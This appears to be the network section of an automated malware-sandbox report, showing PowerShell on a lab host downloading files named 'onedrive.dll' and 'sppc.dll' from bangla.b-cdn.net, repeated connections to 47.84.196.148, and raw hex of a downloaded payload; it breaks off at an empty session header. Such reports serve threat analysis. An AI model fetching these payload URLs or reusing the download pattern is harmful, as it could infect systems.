Dec 19, 2024 13:36:19.301598072 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.301645994 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.301697969 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.301711082 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.301764011 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.313966036 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.314018011 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.314099073 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.314099073 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.314127922 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.314163923 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.314224958 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.319433928 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.809180975 CET	49706	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:20.100474119 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:20.100579977 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:20.100662947 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:20.101818085 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:20.101855993 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:21.797278881 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:21.797399998 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:21.798705101 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:21.798718929 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:21.799077988 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:21.846442938 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:21.850359917 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:21.850378990 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:21.850619078 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:22.689477921 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:22.689693928 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:22.689778090 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:22.689968109 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:22.690007925 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:22.690035105 CET	49709	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:22.690049887 CET	443	49709	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:51.881057024 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:51.881160975 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:51.881278992 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:51.881690979 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:51.881727934 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:53.790841103 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:53.791652918 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:53.791702032 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:53.803867102 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:53.803890944 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:53.803951979 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:53.803961992 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:54.709228039 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:54.709290028 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:54.709357023 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:54.709866047 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:54.709889889 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:36:54.709903955 CET	49785	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:36:54.709911108 CET	443	49785	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:31.521915913 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:31.521996975 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:31.526298046 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:31.530494928 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:31.530538082 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:33.212268114 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:33.216269016 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:33.216289997 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:33.245439053 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:33.245440006 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:33.245466948 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:33.245517969 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:34.117444038 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:34.117523909 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:34.117580891 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:34.117707968 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:34.117748022 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:37:34.117779016 CET	49879	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:37:34.117793083 CET	443	49879	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:09.850261927 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:09.850317955 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:09.850380898 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:09.850961924 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:09.850981951 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:11.523046970 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:11.523153067 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:11.527365923 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:11.527385950 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:11.527610064 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:11.560529947 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:11.560600996 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:11.560743093 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:12.406048059 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:12.406156063 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:12.406199932 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:12.406342983 CET	49965	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:12.406348944 CET	443	49965	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:42.146163940 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:42.146209955 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:42.146286964 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:42.146704912 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:42.146719933 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:43.846441984 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:43.846530914 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:43.848345995 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:43.848351955 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:43.849116087 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:43.882306099 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:43.882306099 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:43.882482052 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:44.737021923 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:44.737337112 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:44.738924980 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:44.742896080 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:44.742914915 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:38:44.742937088 CET	49983	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:38:44.742944002 CET	443	49983	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:21.208311081 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:21.208368063 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:21.210102081 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:21.210745096 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:21.210760117 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:22.885863066 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:22.886054993 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:22.887913942 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:22.887933969 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:22.888277054 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:22.922673941 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:22.922673941 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:22.922837019 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:23.703131914 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:23.703219891 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:23.703463078 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:23.703712940 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:23.703712940 CET	49984	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:23.703736067 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:23.703748941 CET	443	49984	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:51.272222042 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:51.272289038 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:51.272466898 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:51.272972107 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:51.272984982 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:52.948055029 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:52.948306084 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:52.951968908 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:52.952006102 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:52.952387094 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:52.978893042 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:52.978893042 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:52.979043961 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:53.830974102 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:53.831072092 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:53.832046032 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:53.832221031 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:53.832221031 CET	49985	443	192.168.2.5	47.84.196.148
Dec 19, 2024 13:39:53.832237005 CET	443	49985	47.84.196.148	192.168.2.5
Dec 19, 2024 13:39:53.832246065 CET	443	49985	47.84.196.148	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 13:36:09.630408049 CET	52506	53	192.168.2.5	1.1.1.1
Dec 19, 2024 13:36:09.855362892 CET	53	52506	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 13:36:09.630408049 CET	192.168.2.5	1.1.1.1	0x437a	Standard query (0)	bangla.b-cdn.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 13:36:09.855362892 CET	1.1.1.1	192.168.2.5	0x437a	No error (0)	bangla.b-cdn.net		89.35.237.170	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bangla.b-cdn.net

47.84.196.148

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	89.35.237.170	80	5324	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 13:36:09.991586924 CET	173	OUT	GET /onedrive.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bangla.b-cdn.net Connection: Keep-Alive
Dec 19, 2024 13:36:11.410036087 CET	545	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 19 Dec 2024 12:36:11 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Server: BunnyCDN-RI1-892 CDN-PullZone: 3104411 CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90 CDN-RequestCountryCode: US Location: https://bangla.b-cdn.net/onedrive.dll CDN-RequestTime: 0 CDN-RequestId: cce5ff613edcd2bdf7d8b05de1b24e3c Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	89.35.237.170	80	5324	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 13:36:14.847450018 CET	145	OUT	GET /sppc.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bangla.b-cdn.net
Dec 19, 2024 13:36:16.276683092 CET	541	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 19 Dec 2024 12:36:16 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Server: BunnyCDN-RI1-892 CDN-PullZone: 3104411 CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90 CDN-RequestCountryCode: US Location: https://bangla.b-cdn.net/sppc.dll CDN-RequestTime: 1 CDN-RequestId: cc17a0c79d427a63866421a4bfd0bee4 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	89.35.237.170	443	5324	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:36:13 UTC	173	OUT	GET /onedrive.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bangla.b-cdn.net Connection: Keep-Alive
2024-12-19 12:36:13 UTC	673	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 12:36:13 GMT Content-Type: application/octet-stream Content-Length: 103935 Connection: close Server: BunnyCDN-RI1-892 CDN-PullZone: 3104411 CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90 CDN-RequestCountryCode: US Cache-Control: max-age=25600000 ETag: "67629393-195ff" Last-Modified: Wed, 18 Dec 2024 09:19:15 GMT CDN-StorageServer: DE-51 CDN-FileServer: 1023 CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 12/19/2024 12:35:11 CDN-EdgeStorageId: 892 CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: 860d42bb9467db5af50411dc9671d440 CDN-Cache: HIT Accept-Ranges: bytes
2024-12-19 12:36:13 UTC	16384	IN	Data Raw: b5 c1 04 0c 55 f0 75 07 79 fc d1 a8 79 c6 1e 66 04 1a 41 e1 e6 cc d5 db 56 f7 ef bb db 2a 7e 8f d3 22 66 76 2e 07 b3 39 82 d1 b4 07 f7 8b ef 50 63 b2 a4 7f 56 36 06 50 d4 78 09 2f 30 3b e4 50 8c 19 68 bd b8 0a 29 10 47 7a be 48 a6 cc 3b 5f e9 29 81 bf 9d db f7 c9 a5 73 28 6c 18 1d 8f c0 1b 79 68 9b b7 56 dc fa 4c 99 8a 63 ec 18 23 54 6a dd 1b 13 0b 3c 62 7f f6 93 fd 27 f0 61 a5 f5 33 da c7 16 03 7c da 99 57 b4 93 da f2 56 79 e4 c6 6b d2 a0 22 ed db ce ba 1f 39 d8 ed 7d 55 22 34 0d b0 f9 40 30 5a 34 5e eb 2d 05 dc 2d a5 db e6 f9 11 9c 2a 0b 23 8d a5 0b c6 a9 11 97 41 a7 c6 75 0e 92 93 92 a7 b9 f6 17 64 ab 37 17 18 a9 bc 0e 11 ff 7e 4e 81 a5 e6 c0 c1 78 df 4b 09 35 09 71 17 3d 06 a9 ae 26 3d 4e 3a c6 e5 17 34 b6 3c a6 92 9b 69 90 24 36 bd 34 9c 8b a2 f4 db Data Ascii: UuyyfAV~"fv.9PcV6Px/0;Ph)GzH;_)s(lyhVLc#Tj<b'a3\|WVyk"9}U"4@0Z4^--#Aud7~NxK5q=&=N:4<i$64
2024-12-19 12:36:13 UTC	16384	IN	Data Raw: c5 9e 67 b1 99 08 f3 94 d0 57 b5 82 70 22 46 c2 25 35 8d 27 e0 c2 4b 60 df 97 ad 26 2d 50 b7 7b d3 c9 65 f0 e3 5e 13 38 ed c2 d1 de f6 4a 83 d4 bf ab a5 6f 87 03 ce 51 92 ca 87 2c f0 7c f0 95 08 1e 84 f8 42 ab f0 a2 15 a9 7a b4 41 dd 04 ac 53 98 26 b7 e3 59 fb 62 0b 85 c3 d2 72 6e 88 64 26 c8 7e 88 52 7c 3c e0 e0 7c dd 56 35 68 70 c4 62 8d ae 40 db d7 cc 1a a8 d8 82 e5 30 e9 8b 42 3c 88 76 5b e9 5a 67 b7 46 9a 40 36 9d 0f 21 0d c2 2c a4 e1 16 89 3f b3 c8 88 44 02 d0 22 60 d2 18 4a 02 60 d4 a3 3a 92 4d 6e 72 16 4b d8 ca cc de 4d 56 82 e6 9e de ad 0a 22 73 a1 fc 8b 83 88 75 77 27 f2 2c a9 15 2c bc 2f d9 c2 c4 9a d6 93 f2 e1 c3 79 12 99 45 0a c7 8b d7 a5 75 1b 62 ce cd 55 aa 9f 61 b4 db e5 bd fb 1c 46 95 0f 1d 8a a8 66 2a a4 34 07 dc 6a 70 1a 80 77 24 c2 ec Data Ascii: gWp"F%5'K`&-P{e^8JoQ,\|BzAS&Ybrnd&~R\|<\|V5hpb@0B<v[ZgF@6!,?D"`J`:MnrKMV"suw',,/yEubUaFf*4jpw$
2024-12-19 12:36:14 UTC	16384	IN	Data Raw: 5f 8e 31 73 07 b0 56 9a ba a6 6b 97 1b ce ce 90 e5 a4 f6 4a d6 70 01 77 1c 36 8b 06 13 d6 a9 7f 50 26 4b 90 77 03 58 15 ca a2 69 0e 31 83 4f 0f ce 60 06 71 6b 28 1a 17 fd 8e ee 2c 21 3e 88 0c 34 b5 f8 65 25 8f 10 f7 03 3c 17 5c 37 de 41 5b 8c ea bd 8a c0 cb 35 7c c7 ef 71 99 86 70 b8 ef d7 8f 90 69 f9 fe ff 9d 42 9a d0 d0 8e 32 04 b5 90 d2 2d 0a 08 6a 8c 47 b2 9a ac 94 3a 6b c3 13 c0 49 d8 db 45 53 4e bc 9f fc 37 b6 1d 91 31 c8 59 5c ef c4 37 91 66 35 df 2f 40 6c 1e 11 65 d1 31 eb 62 dd 1d 1b b2 fd de 47 be 25 00 c8 90 1c d1 43 9c c5 2d 20 b8 95 a8 b1 15 72 ca 02 d1 a6 96 ad f3 9f 91 f3 88 3a e6 17 ef 2f 3f a0 b2 d5 be b7 87 7e c9 6d f4 a2 6b f7 0d 5b ab 54 c0 df 27 53 20 f7 c3 1a 81 5e fa 07 ee 9f f7 e0 05 96 85 07 79 b9 b7 a7 5a 66 08 51 1e 31 94 82 49 Data Ascii: _1sVkJpw6P&KwXi1O`qk(,!>4e%<\7A[5\|qpiB2-jG:kIESN71Y\7f5/@le1bG%C- r:/?~mk[T'S ^yZfQ1I
2024-12-19 12:36:14 UTC	16384	IN	Data Raw: b5 39 9a 4c 7e 90 b4 8f ef d5 52 43 11 d0 0b 8a 79 44 d4 27 63 17 ec 04 b6 8d b3 d7 ba 08 d4 0d 39 d5 f2 2b 23 38 bb b3 5c 69 ab e5 72 0f b6 5b c7 a5 13 50 7c 4b c8 aa 20 0d 00 15 27 4f 5b 03 d6 fc 41 57 40 64 46 6a 3b 68 07 19 14 38 ad 07 5f f0 81 fa a4 21 96 14 9c 7c 11 4f b7 8a c9 30 6a cd 8c 92 ad a0 ca 32 55 a9 67 c6 02 52 5f 84 80 fc 32 1f 98 2c 69 19 7c 9a 6e 17 45 33 92 a9 20 6d 8e 6b c4 94 a6 b9 7d bd 3c ef fc c0 f7 58 29 5b e6 62 66 58 5a 19 a1 50 17 ca a0 c0 88 f5 51 72 df 0c b3 ad 54 46 5f 5a b7 18 6e 65 49 66 68 17 29 ef c1 c7 d6 8f 44 15 18 56 7b e3 5b 9d 76 f0 f2 79 41 05 75 23 a3 be a7 ac 9a 1d 35 76 cb 17 97 3a 9a 8c e3 45 79 c4 61 ef e7 7c 6d d3 33 f8 3c f6 37 ae 65 df 02 1d 0d a1 e6 1f e9 47 da 67 f2 27 a4 db 34 83 79 c3 7d 99 54 1f 19 Data Ascii: 9L~RCyD'c9+#8\ir[P\|K 'O[AW@dFj;h8_!\|O0j2UgR_2,i\|nE3 mk}<X)[bfXZPQrTF_ZneIfh)DV{[vyAu#5v:Eya\|m3<7eGg'4y}T
2024-12-19 12:36:14 UTC	16384	IN	Data Raw: fa 6c 12 df f2 60 fd f9 ef 5e 87 a9 13 23 b7 97 ff b7 cc fb 7a 73 81 a3 db 9c 2c 6a a7 8a 78 c3 23 bb 8c bb 13 57 42 94 e3 b6 91 1f 6c 46 b4 b5 0a 02 ea 25 00 8d d4 71 bd 07 55 92 cc 01 71 19 df 21 34 9b 14 3f 76 0b 09 74 25 4d 0e 70 97 36 4c f9 78 35 43 d4 8e d3 0f 7a c2 de 45 00 61 b0 a6 12 39 b2 66 5c bb 8d be 10 7a e6 57 51 89 dd 50 72 77 77 c9 45 2f 94 4f e9 ac e9 14 19 55 aa 4a 63 31 dc 49 0b 0f 9a 56 5e ec 97 69 4f b0 27 a1 17 f0 55 06 6b 10 4f b5 49 07 d9 1f 6c 7b e8 94 1b 1b 0c 29 33 24 6e 67 28 c3 ce 98 98 ef 05 ff 93 03 21 db d0 7c af 84 7a ff 53 0f 3e b8 6d 6d 7e cc 4a 7c 57 f7 50 c2 74 45 a0 d6 c4 f2 ef 60 9b 94 d1 d4 99 c0 5d 32 86 e4 f7 da ce ec 25 ba 69 c5 8e be 16 3a ae b8 80 ab 14 c7 fa f9 e7 b0 a7 da 01 ee 9b de e4 f1 d2 0f fa e2 dc 2a Data Ascii: l`^#zs,jx#WBlF%qUq!4?vt%Mp6Lx5CzEa9f\zWQPrwwE/OUJc1IV^iO'UkOIl{)3$ng(!\|zS>mm~J\|WPtE`]2%i:*
2024-12-19 12:36:14 UTC	16384	IN	Data Raw: b9 5f 21 48 c4 b1 29 33 ff 0d bf 61 22 ed ee ae a4 3c 7a 0e ae 08 a2 39 3f 0f ad 73 6a da 08 cc dc 4e 04 45 48 c2 dc 66 45 68 1e 1c 1a 8d 5e bc fd 3d a6 c4 09 d9 56 83 78 5c b4 6e 97 73 43 71 3d 05 f2 c7 ea b9 b3 5e d4 5d 2c 28 3e d7 47 af e1 ae 05 4d de b2 87 36 1e 30 20 f7 c8 64 c0 b8 3f 6b 98 8b e8 f9 dd 66 80 25 c3 96 6d 56 60 f8 a2 d2 82 05 98 4e 7b 19 23 08 d5 bf f5 e0 6f 24 4e ba 63 8f 06 a6 7d 6e 6c fb d7 1c 09 53 10 c1 01 36 a6 c2 3f 99 a8 22 2c cf 2d e6 84 c9 0e c6 ba 9b de 52 b5 8f 65 ef 14 0e bd 1d a6 d0 56 9c b6 ab 99 91 7d 09 53 48 52 62 af 22 e4 16 98 ef dd 6a 50 43 1e 03 a2 84 ba e0 8e 10 e4 87 37 2c ea fb 71 75 65 79 d3 83 4a 7e e0 2a 11 b5 d8 33 f7 1c d7 90 e6 08 cf c2 67 b8 1a 31 0f 15 20 be e2 e3 ab e0 9e c1 2c 28 b5 d8 14 32 58 30 30 Data Ascii: _!H)3a"<z9?sjNEHfEh^=Vx\nsCq=^],(>GM60 d?kf%mV`N{#o$Nc}nlS6?",-ReV}SHRb"jPC7,queyJ~*3g1 ,(2X00
2024-12-19 12:36:14 UTC	5631	IN	Data Raw: dd ac 8e 7f 14 b4 5e 1d 04 8a da f3 76 ba 52 da f9 2b 8f 45 6b b2 aa 5c 46 63 0a c3 36 9e 10 5e dc ad e0 ae 6b 0d 78 94 72 5f ce c3 b1 3b 17 f4 47 67 5b 43 da ec dd 2b fc ec bb 12 23 32 06 08 fe 66 9a 2b 28 d8 fb a4 4e f5 9b 25 0a 7e 1b c0 cf c1 26 57 4d b5 75 cf 6b 06 c0 34 a2 06 3a 14 c0 3c 65 59 f4 cf f0 90 df 85 be c9 3f 7e 15 ab 8b 5e 44 ce fb 41 23 bd 30 86 21 fb 6f 74 e7 1a 34 6f 0e 64 5f b9 af 44 36 ef e8 2f 94 4d b2 d2 04 aa a3 a5 96 8d 16 1d ad ea e7 46 e1 30 a5 b2 53 fc 17 1c e9 38 86 33 6a 0a 09 1e 15 e5 a5 81 d9 7e 90 06 b2 56 81 a4 59 f5 d4 7c 04 90 6c bc 91 37 6c 94 88 a8 a4 40 04 ff e2 e5 2f a9 ad 68 ec 63 71 5d 0d fc b3 44 aa f1 20 07 33 e1 fc 28 74 31 d1 2e 5a 09 65 97 e8 7f c3 62 16 82 1f ad de b0 73 40 38 f4 01 f5 0d 02 ba b3 f3 4d 2f Data Ascii: ^vR+Ek\Fc6^kxr_;Gg[C+#2f+(N%~&WMuk4:<eY?~^DA#0!ot4od_D6/MF0S83j~VY\|l7l@/hcq]D 3(t1.Zebs@8M/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
